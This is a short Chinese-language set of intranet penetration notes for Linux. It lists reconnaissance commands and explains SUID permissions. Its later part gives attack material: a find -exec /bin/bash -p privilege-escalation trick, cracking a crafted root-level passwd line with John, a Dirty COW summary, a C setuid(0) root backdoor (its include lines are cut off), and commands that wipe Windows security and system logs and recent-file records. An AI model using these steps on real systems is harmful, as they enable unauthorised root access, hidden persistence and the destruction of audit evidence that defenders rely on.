内网渗透笔记——与linux相关

信息收集相关命令

查看内核/系统

uname -a
cat /proc/version
hostnamectl
dmesg | grep Linux

lsb_release -a

redhat 红帽下专用命令
    cat /etc/redhat-release

getconf LONG_BIT  查看操作系统位数
cat /etc/*release    查看linux发行版信息

查看操作记录

cat ~/.zsh_history
cat ~/.mysql_history
dpkg -l nmap  查找软件版本

         预期状态(最前面的第一个字母)
         当前状态(最前面的第二个字母):(i)已安装;(n)未安装

权限

-rwx r-x r-x

-:文件类型(-:文件;d:目录;l:lnk文件 软/硬链接)
rwx:当前用户
r-x:同组用户
r-x:其他用户

s权限:在执行该程序的时候,会以文件所有者的权限去执行

root:chmod u+s fileName
- rws --- --- fileName

user$: ./fileName = root#: ./fileName      普通用户user执行filename的时候等于root执行

提权

find命令:

find / -perm -u=s -type f 2>/dev/null   查找有s权限的文件,将错误输出输出到空栈


sudo -l   看看我们能用sudo执行哪些东西(sudo:以管理员身份运行程序)

find 1.txt -exec /bin/bash -p \;(奇怪的操作,先给find赋予s权限,然后利用find的参数-exec去运行bash文件,是以管理员身份去运行)

john 密码爆破工具

echo ajie:SGHLWPbYfiLLg:0:0:sajiea:/root:/bin/bash > pass
john pass

脏牛漏洞

## 脏牛漏洞

编号:CVE-2016-5195

影响范围:2016前十年的linux版本,安卓android

效果:覆盖root用户,重新生成指定用户并且带有特权

在野利用:官方未公布,少数人知道

exp交易:暗网

表层:常规网站

深网:后台等一些看不见的

暗网:需要特殊渠道

简单提权后门

#include
#include
int main(){

        setuid(0);
        system("/bin/bash -p");
}

清除痕迹

msf:clearev

windows:

wevtutil:
    wevtutil el                    查看所有日志
    wevtutil cl    system            清除系统日志
    wevtutil cl application        清除应用程序日志
    wevtutil cl security        清除安全日志
    
recent(最近操作记录)
    del /f /s /q "%userprofile%\recent\*.\*"

你可能感兴趣的:(linux,运维,安全)